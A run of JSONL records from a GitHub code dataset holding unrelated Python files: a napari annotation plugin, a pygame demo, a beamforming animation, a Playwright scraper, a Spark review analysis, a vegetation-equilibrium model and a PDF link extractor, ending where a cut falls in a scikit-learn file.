glob\n\n\n\n#@magicgui(call_button='Scan Files')\ndef list_images(path)->list:\n \"\"\"\n A magicgui widget that takes a path and lists all .png images in that path\n \"\"\"\n print(\"Scanning Directory...\")\n #path = base_path\n #png_files = [entry.name for entry in os.scandir(path) if entry.name.endswith('.png') and entry.is_file()]\n\n def scantree(path):\n \"\"\"Recursively yield DirEntry objects for given directory.\"\"\"\n for entry in os.scandir(path):\n if entry.is_dir(follow_symlinks=False):\n yield from scantree(entry.path) # see below for Python 2.x\n else:\n yield entry\n \n global png_files\n \n png_files = {}\n \n for entry in scantree(base_path):\n if entry.name.endswith('_mic.tif') and entry.is_file():\n png_files[entry.name] = entry.path\n \n \n png_files = {key:png_files[key] for key in sorted(png_files.keys())}\n \n print(png_files)\n \n global selector\n selector.x.choices = png_files.copy().keys()\n #selector.update_args()\n\n return png_files\n\n\n####\n\nglobal png_files\n\npng_files = {}\n\nmicro_path = None\nlabel_path = None\nlabel_name = 
None\n\n\n@magicgui(x=dict(widget_type='Select', choices=png_files.keys()))\ndef selector(x):\n update = False\n \n png_key = x[0]\n \n global png_files \n \n print(\"PNG KEYS: \")\n print(png_files.keys())\n \n if png_key is not None:\n global micro_path\n global label_path\n micro_path = png_files[png_key]\n label_path = micro_path[:-len(\"_mic.tif\")]+\"_label.tif\" # strip the \"_mic.tif\" suffix (rstrip strips characters, not a suffix)\n new_micro_image = skimage.io.imread(micro_path)\n try:\n new_label_image = skimage.io.imread(label_path)\n except:\n print(\"no label found\")\n update = True\n \n \n if update:\n global viewer \n try:\n viewer.layers.remove(viewer.layers[0])\n except:\n print(\"could not remove layers\")\n \n \n try:\n viewer.layers.remove(viewer.layers[0])\n except:\n print(\"could not remove layers\")\n \n \n \n global label_name\n label_name = 'seg:'+str(label_path.split(\"/\")[-1])\n viewer.add_image(new_micro_image,name='mic:'+str(micro_path).split(\"/\")[-1])\n try: \n label_layer = viewer.add_labels(new_label_image, name=label_name,color=color_dict_with_one_based_index)\n except:\n pass\n \n selector.x.choices = png_files.copy().keys()\n\n\n print(x)\n \n \n #viewer = napari.view_image(new_micro_image, name='micro_image', rgb=False)\n #label_layer = viewer.add_labels(new_label_image, name='segmentation',color=color_dict_with_one_based_index)\n\n\n#@magicgui(call_button='call')\n##def path_widget(fn = pathlib.Path.home()):\n#def empty_widget():\n# print(\"hit\")\n# def path_widget(fn = Path(os.getcwd())):\n# print(fn)\n# global base_path\n# base_path = fn\n\n\n\n\n\nsave_annotation_widget = viewer.window.add_dock_widget(save_annotation)\nsave_annotation_widget.name = \"Save Annotation\"\n\n#viewer.window.add_dock_widget(display_image)\ncolor_widget = viewer.window.add_dock_widget(image_widget,area=\"left\")\ncolor_widget.name = \"Color Reference\"\n\npath_selector = viewer.window.add_dock_widget(path_widget,area=\"right\")\npath_selector.name = \"Path Selector\"\n#viewer.window.add_dock_widget(list_images,area=\"right\")\n\nfile_display_widget = viewer.window.add_dock_widget(selector,area=\"right\")\nfile_display_widget.setFixedHeight(650)\nfile_display_widget.name = \"Image Selector\"\nselector.x.min_height = 600\n\n#list_view = selector.x.widget.list_view\n#list_view.setFixedHeight(400)\n\n\n\n\n\n\nimport code\ncode.InteractiveConsole(locals=globals()).interact()\n","repo_name":"MartGro/EMcapsulin_Toolbox","sub_path":"napari_plugin/napari_plugin_tif.py","file_name":"napari_plugin_tif.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"682514460","text":"import pygame\n\npygame.init()\n\n# CORES\nVERMELHO = (255, 0, 0)\nAZUL = (0, 0, 255)\nVERDE = (0, 255, 0)\nBRANCO = (255, 255, 255)\nPRETO = (0, 0, 0)\nCINZA = (150, 150, 150)\n\n# DIMENSÕES DA TELA\nALTURA = 600\nLARGURA = 800\n\n# DEFINIÇÕES DA JANELA\ntela = pygame.display.set_mode([LARGURA, ALTURA])\ntela.fill(CINZA)\npygame.display.set_caption(\"Minha primeira tela\")\n\n# CLOCK DO JOGO\nclock = pygame.time.Clock()\n\n# SUPERFÍCIES\nsuperficie = pygame.Surface([760, 560])\nsuperficie.fill(BRANCO)\n\n# RETÂNGULOS\nquadrado = pygame.Rect(100, 100, 50, 50)\n\n# LOOP DO JOGO\nexecutando = True\nwhile executando:\n\n\t# VERIFICANDO EVENTOS\n\tfor evento in pygame.event.get():\n\n\t\t# EVENTO DE FECHAR A TELA\n\t\tif evento.type == pygame.QUIT:\n\t\t\texecutando = False\n\n\t\t# EVENTOS DE TECLA PRESSIONADA\n\t\tif evento.type == pygame.KEYDOWN:\n\t\t\tif evento.key == 
pygame.K_DOWN:\n\t\t\t\tquadrado.move_ip([0, 20])\n\t\t\tif evento.key == pygame.K_UP:\n\t\t\t\tquadrado.move_ip([0, -20])\n\t\t\tif evento.key == pygame.K_LEFT:\n\t\t\t\tquadrado.move_ip([-20, 0])\n\t\t\tif evento.key == pygame.K_RIGHT:\n\t\t\t\tquadrado.move_ip([20, 0])\n\n\t# ELEMENTOS DA TELA\n\ttela.blit(superficie, [20, 20])\n\tpygame.draw.rect(tela, VERMELHO, quadrado)\n\n\t# CONFIGURAÇÃO DE QUADROS\n\tclock.tick(27)\n\tpygame.display.update()\n\npygame.quit()","repo_name":"jjpaulo2/minicurso-pygame-vii-seifpi","sub_path":"jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27020667611","text":"import waves\nfrom tqdm import tqdm\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2\nimport imageio\n\n\nif __name__ == \"__main__\":\n ############\n \"\"\"let 1 px = 1um\"\"\"\n LAMBDA = 40\n HEIGHT = 600\n WIDTH = 400\n TRANSMITTERS = 20\n ############\n disp = np.zeros((HEIGHT,WIDTH))\n sources = []\n frames = []\n for i in range(-int(TRANSMITTERS/2), int(TRANSMITTERS/2)):\n sources.append(waves.Point_Source(WIDTH/2 + 10*i, HEIGHT-10, LAMBDA))\n\n for phi in tqdm(np.linspace(-np.pi/4, np.pi/4, 50), desc = \"generating frames\"):\n disp = np.zeros((HEIGHT,WIDTH))\n for s in range(len(sources)):\n sources[s].alter_phase(s * phi)\n sources[s].gen_wave(disp)\n disp = disp**2 # obtain intensity\n disp = np.array(255 * disp / np.max(disp), dtype=np.uint8)\n for s in range(len(sources)):\n disp = cv2.circle(disp, (sources[s].x, sources[s].y), 3, (255,0,255), 2)\n frames.append(disp)\n frames.extend(frames[::-1])#reverse pass\n imageio.mimwrite(\"beamforming.gif\", np.array(frames).astype(np.uint8), format= '.gif', fps = 20)\n \n","repo_name":"mathster101/Wave-Interference","sub_path":"beamforming_animation.py","file_name":"beamforming_animation.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14473727352","text":"import os\nfrom dotenv import load_dotenv, find_dotenv\nfrom playwright.sync_api import sync_playwright, Page, Locator\nimport time\nimport random\nfrom typing import List, Dict, Any, Union, Iterator\nfrom configparser import ConfigParser\nfrom fake_useragent import UserAgent\nfrom parser import Parser\nfrom log import logger\n\n\nclass Scraper:\n def __init__(\n self,\n debug_mode: bool,\n start_url: str,\n proxy: str,\n output_file: str,\n mapping_file: Dict,\n wait_time: List,\n random_user_agent: bool,\n ) -> None:\n \"\"\"\n Initialize the Scraper object.\n\n Args:\n debug_mode (bool): Enable or disable debug mode for extra logging.\n start_url (str): The URL to start scraping from.\n proxy (str): The proxy server to be used for making HTTP requests.\n output_file (str): The file to store the scraped data.\n mapping_file (str): The file containing the mapping configuration.\n wait_time (list): Range of time to wait between consecutive requests.\n random_user_agent (bool): Use random user agents for each request.\n logger (logging.Logger): The logger object to handle logging.\n \"\"\"\n\n self.mapping = mapping_file\n self.debug_mode = debug_mode\n self.start_url = start_url\n self.proxy = proxy\n self.output_file = output_file\n self.wait_time = wait_time\n self.random_user_agent = random_user_agent\n if debug_mode:\n logger.enable_debug_mode()\n\n def delayed_click(self, element: Locator) -> None:\n \"\"\"\n Perform a delayed 
click on the provided Playwright Locator.\n\n        Args:\n            element (Locator): The Playwright Locator representing the element to click.\n\n        Raises:\n            TimeoutError: If the element does not become visible within the specified time range.\n        \"\"\"\n        if element.is_visible():\n            wait_time = round(random.uniform(self.wait_time[0], self.wait_time[1]), 2)\n            logger.info(f\"Waiting for {wait_time} seconds\")\n            time.sleep(wait_time)\n            element.click()\n        else:\n            logger.error(\"Element not visible. Click action timed out.\")\n            raise TimeoutError(\"Element not visible. Click action timed out.\")\n\n    def scrape_data_from_page(self, page: Page) -> Dict[str, List[Any]]:\n        \"\"\"\n        Scrape data from the given page using the provided mapping.\n\n        Args:\n            page (Page): The Playwright Page object representing the web page to scrape.\n\n        Returns:\n            Dict[str, List[Any]]: A dictionary containing the scraped data.\n                The keys represent the data names, and the values are lists of scraped data.\n        \"\"\"\n        scraped_data = {}\n\n        for item in self.mapping['scrape']:\n            name = item['name']\n            xpath = item['xpath']\n            element_type = item['type']\n\n            page.wait_for_selector(xpath)\n\n            elements = page.query_selector_all(xpath)\n            if elements:\n                values = [Parser.validate_element(element_type, element.inner_text()) for element in elements]\n                scraped_data[name] = values\n\n        return scraped_data\n\n    def scrape_data_from_all_pages(self, page: Page) -> Iterator[Dict[str, List[Any]]]:\n        \"\"\"\n        Scrape data from all pages using pagination.\n\n        Args:\n            page (Page): The Playwright Page object representing the initial web page to scrape.\n\n        Yields:\n            Iterator[Dict[str, List[Any]]]: An iterator yielding dictionaries containing the scraped data.\n                Each dictionary represents data from a single page.\n                The keys represent the data names, and the values are lists of scraped data.\n                The iterator will stop when there are no more visible next pages to scrape.\n        \"\"\"\n        scraped_data = self.scrape_data_from_page(page)\n        yield scraped_data\n\n        next_page_button = page.locator(\"xpath=\" + self.mapping['pagination']['next_page_button_xpath'])\n        while next_page_button.is_visible():\n            self.delayed_click(next_page_button)\n            page.wait_for_load_state(\"networkidle\")\n            scraped_data = self.scrape_data_from_page(page)\n            yield scraped_data\n\n            next_page_button = page.locator(\"xpath=\" + self.mapping['pagination']['next_page_button_xpath'])\n\n    def initialize_browser_instance(self, playwright, proxy):\n        \"\"\"\n        Initialize the Playwright browser instance.\n\n        If a proxy is provided, set it as a browser launch option.\n        If a random user agent is requested, set it on the browser context.\n\n        Returns:\n            (Browser, Page): The launched browser and a page opened in a new context.\n        \"\"\"\n        if proxy:\n            logger.info(f'Proxy: {proxy}')\n            proxy = {'server': proxy}\n        else:\n            proxy = None\n        browser = playwright.chromium.launch(proxy=proxy, headless=not self.debug_mode)\n\n        if self.random_user_agent:\n            user_agent = UserAgent().random\n            context = browser.new_context(\n                user_agent=user_agent\n            )\n            logger.info(f'User agent: {user_agent}')\n        else:\n            context = browser.new_context()\n        logger.info(\"Browser initialized successfully\")\n        return browser, context.new_page()\n\n    def main(self) -> None:\n        \"\"\"\n        Main method to initiate the scraping process.\n\n        This method sets up the browser, navigates to the input URL,\n        and performs the scraping using 'scrape_data_from_all_pages' method.\n        The scraped data is then parsed using 'Parser.dict_with_lists_to_list_of_dicts' and returned.\n\n        Raises:\n            Exception: If an error occurs during the scraping 
process.\n \"\"\"\n with sync_playwright() as playwright:\n result: List[Dict[str, Any]] = []\n\n logger.info('Initializing browser')\n browser, page = self.initialize_browser_instance(playwright, self.proxy)\n\n try:\n page.goto(self.start_url)\n page.wait_for_load_state(\"networkidle\")\n except Exception as e:\n logger.error(str(e))\n browser.close()\n if self.restart_without_proxy:\n logger.info('Initializing browser again without proxy')\n browser, page = self.initialize_browser_instance(playwright, None)\n try:\n page.goto(self.start_url)\n page.wait_for_load_state(\"networkidle\")\n except Exception as e:\n logger.error(str(e))\n raise\n else:\n raise\n\n logger.info('Beginning scraping process')\n\n page_number = 0\n try:\n for scraped_data in self.scrape_data_from_all_pages(page):\n page_number += 1\n scraped_data = Parser.dict_with_lists_to_list_of_dicts(scraped_data)\n result.extend(scraped_data)\n logger.info(f\"Page number {page_number} scraped successfully\")\n except Exception as e:\n logger.error(str(e))\n page.screenshot(path='screenshot.png', full_page=True)\n raise\n\n browser.close()\n return result\n\n\nif __name__ == '__main__':\n config = ConfigParser()\n config_file_path = os.path.join(os.path.dirname(__file__), 'config.ini')\n config.read(config_file_path)\n\n env_file = config.get('DEFAULT', 'env_filename')\n\n if '/' in env_file:\n dotenv_path = env_file\n else:\n dotenv_path = find_dotenv(env_file)\n\n load_dotenv(dotenv_path)\n\n scraper = Scraper(config)\n scraper.main()\n","repo_name":"vdcsolutions/scraping_dojo_07_2023","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73993850510","text":"# Read data from HDFS\nuser_data = sc.textFile(\"dbfs:/FileStore/shared_uploads/gauravjoshi0910@gmail.com/user.csv\")\nreview_data = sc.textFile(\"dbfs:/FileStore/shared_uploads/gauravjoshi0910@gmail.com/review.csv\")\n\n# split input files into list\nusers = user_data.map(lambda x : x.split(\"::\"))\nreview = review_data.map(lambda x : x.split(\"::\"))\n\n# Get total number of reviews\ntotal_reviews = review.count()\n\n# sum up all the ratings for business id\nformat_reviews = review.map(lambda x : (x[1], 1)).reduceByKey(lambda x,y: x+y)\n\n# format users based on their id and name\nformat_users = users.map(lambda x : (x[0], x[1]))\n\n# Get the total number of reviews for each user \nusers_with_reviews = format_users.join(format_reviews).map(lambda x : (x[1][0], x[1][1]))\n\n# Get user's contribution\nuser_review_contribution = users_with_reviews.map(lambda x : (x[0], x[1] * 100/total_reviews))\nleast_contributions = user_review_contribution.sortBy(lambda x : x[1])\n\n# format output as required\noutput = least_contributions.map(lambda x:\"{} \\t{}\".format(x[0], x[1]))","repo_name":"gauravjoshi1/big-data-utd","sub_path":"Homework-2/Question5/Question5.py","file_name":"Question5.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"47153829879","text":"\"\"\"This module is used to create the path and select path where\nthe videos downloaded will be put into \"\"\"\n\n# importing modules\nfrom tkinter import filedialog\nimport os\n\n\n# leaf directory\ndirectory = \"downloaded\"\n# Parent directories\nparent_dir = \"C:/Youtube downloader\"\n\n# default path for this program\npath = os.path.join(parent_dir, directory)\n\n# 
creating the path when the user runs the program for the first time and returning it to the main file\n# so it can be used as the default path where videos are saved\ndef create_path():\n    try:\n        os.makedirs(path, exist_ok=True)\n        return path\n    except Exception as e:\n        return\n\n# function to allow user to select a path they want their videos to be downloaded to\ndef select_path(var):\n    #allows user to select a path from the explorer\n    finding_path = filedialog.askdirectory()\n    finding_path = path if finding_path == \"\" else finding_path # setting path back to the default path if user did not select path\n    # set stringvar to path\n    var.set(finding_path)","repo_name":"JoeLW-12324/Youtube_downloader","sub_path":"path_selection.py","file_name":"path_selection.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35312372029","text":"\"\"\"\n\nPython 2.7, Encoding: UTF-8\n\nCreated on Fri Apr 12 14:24:24 2019\n\n@author: A.Argles (aa760@exeter.ac.uk)\n\nDescription: Contains the continuous form of the equilibrium solutions.\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.special import gammainc\nfrom scipy.special import gamma\nfrom scipy.optimize import root\n\n\ndef find_mu_nu_continuous(mu_init,nu_obs,alpha,phi_g,tol = None):\n    \"\"\"\n    Uses scipy.optimize.root to get the mu value based upon an observed \n    coverage.\n    \n    Inputs:\n    \n    - mu_init, the \"guessed\" turnover ratio for the iterative process,\n      defined as: gamma_init * m_init/g_init (-)\n    \n    - nu_obs, the observed coverage of a PFT. (-)\n    \n    - alpha, the reseed fraction. (-)\n    \n    - phi_g, the growth mass scaling parameter. (-)\n    \n    - tol, tolerance for termination of the numerical root finding process.\n      (-)\n    \n    \n    Outputs:\n    \n    - mu, the continuous estimate of the boundary turnover ratio, defined as: \n      gamma_init * m_init/g_init. (-)\n    \n    \"\"\"\n    \n    args = (alpha,phi_g,nu_obs)\n    \n    mu = root(Y,mu_init,args = args, jac = dY_dmu, tol = tol).x[0]\n    \n    return mu\n\n\n\n    \n#%% Secondary Functions\n\ndef Y(mu,alpha,phi_g,nu_obs): \n    \"\"\"\n    Solving for the steady state continuous vegetation fraction, based upon \n    the assumed competition of random overlap for seedlings (seedlings only \n    grow in non-vegetative areas.), while also subtracting nu_obs.\n    \n    Inputs:\n    \n    - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n    \n    - alpha, the reseed fraction. (-)\n    \n    - phi_g, the growth mass scaling parameter. (-)\n    \n    - nu_obs, the observed coverage of a PFT. (-)\n    \n    Outputs:\n    \n    - Y, the difference between observed and equilibrium fractions. (-)\n    \n    Equations are derived in technical notes (needs reference)\n    \n    Called: \"find_mu_nu_continuous\"\n    \n    \"\"\"\n    \n    \n    Y = nu_eq_analy(mu,alpha,phi_g) - nu_obs\n    \n\n    return Y\n    \n\ndef dY_dmu(mu,alpha,phi_g,nu_obs):\n    \n    \"\"\"\n    Finds the continuous value for the gradient of vegetation fraction with mu.\n    \n    Inputs:\n    \n    - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n    \n    - alpha, the reseed fraction. (-)\n    \n    - phi_g, the growth mass scaling parameter. (-)\n    \n    - nu_obs, the observed coverage of a PFT. (-)\n    \n    Outputs:\n    \n    - dY_dmu, continuous solution to the vegetation fraction \n      gradient with respect to mu. 
(-)\n \n Called: - \"find_mu_nu\"\n \n \"\"\" \n \n dY_dmu = nu_eq_analy_dmu(mu,alpha,phi_g)\n \n return dY_dmu\n\n\ndef nu_eq_analy(mu,alpha,phi_g):\n \n \"\"\"\n Finds the analytical form of the equilibrium fraction from mu and alpha.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n - alpha, the reseed fraction. (-)\n \n \n Outputs:\n \n - nu_eq, the equilibrium vegetation fraction of a PFT. (-)\n \n \n \"\"\" \n\n r_alpha = (1. - alpha)/alpha\n\n x = 1./(1. - phi_g)\n \n gam = Gam(x,x*mu)\n \n E = np.exp(x*mu)\n\n nu_eq = 1. - r_alpha * mu * (x*mu)**(x-1.0) /(E*gam)\n \n return nu_eq\n \n \n \ndef nu_eq_analy_dmu(mu,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the gradient of vegetation fraction based\n upon the analytical solutions.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n Outputs:\n \n - dnu_anly_dmu, analytical solution to the vegetation fraction \n gradient. (-)\n \n \n \"\"\" \n \n r_alpha = (1. - alpha)/alpha\n\n x = 1./(1. - phi_g)\n \n gam = Gam(x,x*mu)\n \n E = np.exp(x*mu)\n\n numerator = E * gam * ((x*mu)**x/mu) - \\\n mu *(x*mu)**(x-1.0) * (x * gam * E - (mu * x)**x/mu) \n \n denominator = (E * gam ) **2\n \n dnu_anly_dmu = - r_alpha * numerator / denominator\n \n \n \n return dnu_anly_dmu\n\n\ndef M_tot_eq_analy(mu,nu_eq,m_init,a_init,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the total biomass.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - nu_eq, the equilibirum fraction. (-)\n \n - m_init, the mass of a sapling. (kg)\n \n - a_init, the crown area of a sapling. (m^2)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n \n Outputs:\n \n - M_tot, the toal vegetation carbon from the equilbirum fraction. \n (kg m^2)\n \n \n \"\"\" \n \n x = 1.0/(1.0 - phi_g)\n \n \n gam = Gam(x + 1.0 , mu * x)\n \n N_eq = N_tot_eq_analy(mu,nu_eq,a_init,alpha,phi_g)\n \n M_eq = m_init * N_eq *(mu*x)**(-x) * np.exp(mu*x) * gam\n\n\n return M_eq\n \n\ndef N_tot_eq_analy(mu,nu_eq,a_init,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the total stand density.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - nu_eq, the equilibirum fraction. (-)\n \n - a_init, the crown area of a sapling. (m^2)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n \n Outputs:\n \n - N_tot, the toal stand density from the equilbirum fraction. \n (kg m^2)\n \n \n \"\"\" \n \n x = 1.0/(1.0 - phi_g)\n gam = Gam(phi_g*x+1,mu*x)\n \n N_eq = nu_eq* (x*mu)**(x) /(a_init * np.exp(x*mu)*gam) \n \n return N_eq\n \n \ndef Gam(s,x):\n \"\"\"\n Computes the incomplete gamma function from the scipy functions. \n \n Inputs:\n \n Y = Integral[t^(s - 1) exp(-t) dt]{0 -> x}\n \n - s, power of the gamma frunction integral Y. (-)\n \n - x, the upperbound to the integral Y. (-)\n \n Outputs:\n \n - Y, the incomplete gamma funtion. 
(-)\n \n \"\"\"\n Y = gamma(s) * (1 - gammainc(s,x))\n \n return Y","repo_name":"aargles/RED_DGVM","sub_path":"RED_MODULE/RED_SUBROUTINE/EQUILIBRIUM_ANALYTICAL.py","file_name":"EQUILIBRIUM_ANALYTICAL.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"38102259714","text":"import re,math,codecs,random\nimport numpy as np\nfrom tqdm import trange\nclass BatchManager(object):\n def __init__(self,data,batch_size,args):\n self.batch_data=self.sort_and_pad(data,batch_size,args)\n self.len_data=len(self.batch_data)\n \n def sort_and_pad(self,data,batch_size,args):\n self.num_batch=int(math.ceil(len(data)/batch_size))\n print(\"num_batch: \",self.num_batch)\n batch_data=list()\n for i in trange(self.num_batch):\n batch_data.append(self.pad_data(data[i*batch_size:(i+1)*batch_size],args))\n \n return batch_data\n @staticmethod\n def pad_data(data,args):\n da0=[]\n da1=[]\n for t in data:\n da0.append(t[0])\n da1.append(t[1])\n return [da0,da1]\n def iter_batch(self,shuffle=True):\n if shuffle:\n random.shuffle(self.batch_data)\n for idx in range(self.len_data):\n yield self.batch_data[idx]\n ","repo_name":"mzl163/AICITY23_Task4","sub_path":"mlp/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7304686437","text":"\"\"\"\nGet the words from a PDF\n\npython3 get_links_from_pdf.py /source/to/pdf\n\n----------------------------\n\nExample:\npython3 get_links_from_pdf.py /source/to/pdf --page_start 232 --page_end 254\n\n----------------------------\n\nParameters:\n--page_start [(0,Infinity)]\n Starting page, defaults to 0\n\n--page_end [(0,Infinity)]\n Ending page, defaults to end of document\n\n--paragraph_start [(0,Infinity)]\n Starting paragraph, defaults to 0, the first paragraph\n\n--paragraph_end [(0,Infinity)]\n Ending paragraph, defaults to end of page\n\n----------------------------\n \nOptionals:\n--unique:\n [FLAG] Determines wether to return all links only once\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport re\nfrom ast import Dict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom sys import maxsize\nfrom typing import Callable, List\n\nfrom pypdf import PageObject, PdfReader\n\nPARAGRAPH_DELIMITER = \"\\n\\n\"\nINFINITY = maxsize\n\n\ndef get_cli_args():\n \"\"\"Returns the CLI args\"\"\"\n parser = argparse.ArgumentParser(\n prog='get_words_from_pdf',\n description='Gets the words from a PDF and applies some operations to them',\n epilog='Developed by Pepe Fabra Valverde'\n )\n\n # path\n parser.add_argument('filename',\n help=\"Absolute path to the PDF\")\n\n # parameters\n parser.add_argument('--page_start', type=int,\n help=\"Start reading since this page\", default=0)\n parser.add_argument('--page_end', type=int,\n help=\"Stop reading since at this page\", default=INFINITY)\n parser.add_argument('--paragraph_start', type=int,\n help=\"Start reading since this paragraph\", default=0)\n parser.add_argument('--paragraph_end', type=int,\n help=\"Stop reading since at this paragraph\", default=INFINITY)\n\n # optional \"flags\"\n parser.add_argument('-u', '--unique', action='store_true',\n help=\"Determines wether to return all links only once\",\n default=False, required=False)\n\n args = parser.parse_args()\n\n return {\n \"filename\": args.filename,\n \"page_start\": args.page_start,\n \"page_end\": args.page_end,\n 
\"paragraph_start\": args.paragraph_start,\n \"paragraph_end\": args.paragraph_end,\n \"unique\": args.unique\n }\n\n\ndef get_pdf(filename: str) -> PdfReader:\n \"\"\"Returns the PdfReader instance, or raises an error\"\"\"\n if not os.path.exists(os.path.realpath(filename)):\n raise FileNotFoundError(\"File not found in the system\")\n\n return PdfReader(filename)\n\n\ndef get_pages(pdf_instance: PdfReader, page_start: int, page_end: int) -> List[PageObject]:\n \"\"\"Gets the pages by range\"\"\"\n if len(pdf_instance.pages) <= 0:\n raise ValueError(\"Empty content, no pages were found in the PDF\")\n\n return [\n page\n for index, page in enumerate(pdf_instance.pages)\n if page_start <= index <= page_end\n ]\n\n\ndef subtract_text(\n pages: List[PageObject],\n paragraph_start: int,\n paragraph_end: int,\n on_page_read: Callable[[str], None],\n) -> None:\n \"\"\"Gets the text from the pages, might use a concurrency/parallelism technique\"\"\"\n # evaluate first paragraph clause\n on_page_read(\n PARAGRAPH_DELIMITER.join(\n pages[0]\n .extract_text()\n .split(PARAGRAPH_DELIMITER)[paragraph_start:]\n )\n )\n\n # evaluate the rest\n with ThreadPoolExecutor() as executor:\n executor.map(\n lambda page: on_page_read(page.extract_text()),\n pages[1:-1],\n )\n\n # evaluate last paragraph clause\n on_page_read(\n PARAGRAPH_DELIMITER.join(\n pages[-1]\n .extract_text()\n .split(PARAGRAPH_DELIMITER)[:paragraph_end]\n )\n )\n\n\ndef get_hyperlinks_from_text(text: str) -> List[str]:\n \"\"\"Retrieves all the hyperlinks from a text\"\"\"\n return re.findall(r\"(https?://\\S+)\", text)\n\n\ndef get_hyperlinks(\n pages: List[PageObject],\n paragraph_start: int = 0,\n paragraph_end: int = INFINITY,\n unique: bool = False\n) -> List[str]:\n \"\"\"Returns all the hyperlinks\"\"\"\n hyperlinks: List[str] = []\n\n subtract_text(\n pages,\n paragraph_start,\n paragraph_end,\n on_page_read=lambda x: hyperlinks.extend(\n get_hyperlinks_from_text(x)\n )\n )\n\n if unique:\n hyperlinks = list(set(hyperlinks))\n\n return hyperlinks\n\n\ndef prepare(cli_args: Dict) -> None:\n \"\"\"Prepares the system\"\"\"\n logger = logging.getLogger(\"pypdf\")\n logger.setLevel(logging.ERROR)\n\n assert cli_args[\"filename\"].endswith(\".pdf\")\n assert cli_args[\"page_start\"] <= cli_args[\"page_end\"]\n\n if cli_args[\"page_start\"] == cli_args[\"page_end\"]:\n assert cli_args[\"paragraph_start\"] <= cli_args[\"paragraph_end\"]\n\n\ndef entrypoint() -> None:\n \"\"\"Entrypoint\"\"\"\n cli_args = get_cli_args()\n prepare(cli_args)\n\n pdf_instance = get_pdf(cli_args[\"filename\"])\n\n pages = get_pages(\n pdf_instance,\n cli_args[\"page_start\"],\n cli_args[\"page_end\"]\n )\n\n hyperlinks = get_hyperlinks(\n pages,\n cli_args[\"paragraph_start\"],\n cli_args[\"paragraph_end\"],\n unique=cli_args[\"unique\"]\n )\n\n print(hyperlinks)\n\n\nif __name__ == \"__main__\":\n entrypoint()\n","repo_name":"jofaval/utilities","sub_path":"python/get_links_from_pdf.py","file_name":"get_links_from_pdf.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"19094692906","text":"\"\"\" randomWalker3D_iso.py\n\nmodule implementing 3D random walker\n\nSupplementary material for the lecture \"Computational Photonics\" held at \nLeibniz University Hannover in summer term 2017\n\nDATE: 2017-05-02\nAUTHOR: O. 
Melchert\n\"\"\"\nimport random\nfrom randomVariateGenerator import UnitSphere\n\nclass RandomWalker3D_iso(object):\n \"\"\"isotropic random walker in 3D space\"\"\"\n def __init__(self, r=random.random, x0=(0,0,0), w0=(0,0,1) ):\n \"\"\"instance of 1D random walker class\n\n Args: \n x0 (3-tuple, floats) starting point of walk (default: x0=(0,0,0))\n w0 (3-tuple, floats) ini directional cosines (default: w0=(0,0,1))\n r (function) random number generator\n\n Attrib:\n x (3-tuple, float) current walker position\n w (3-tuple, float) current directional cosines\n nSteps (int) number of steps taken\n wSamp (object) directional cosine sampler\n \"\"\"\n self.x0 = x0\n self.w = w0\n self.x = x0\n self.nSteps = 0\n self.wSamp = UnitSphere(r).generate\n\n def step(self):\n \"\"\"perform single step\n \"\"\"\n ux, uy, uz = self.x\n wx, wy, wz = self.w \n \n self.x = (ux+wx, uy+wy, uz+wz)\n self.w = self.wSamp()\n self.nSteps += 1\n\n\n\n# EOF: randomWalker3D_iso.py\n","repo_name":"omelchert/CompTissueOpt-2017","sub_path":"2017-05-03-Lecture02/src/randomWalker3D_iso.py","file_name":"randomWalker3D_iso.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11384109017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 7 10:23:15 2019\r\n\r\n@author: HAR-UP\r\n\"\"\"\r\n\r\nfrom sklearn import svm\r\nfrom sklearn.ensemble import RandomForestClassifier as RndFC\r\nfrom sklearn.neural_network import MLPClassifier as ffp\r\nfrom sklearn.neighbors import KNeighborsClassifier as 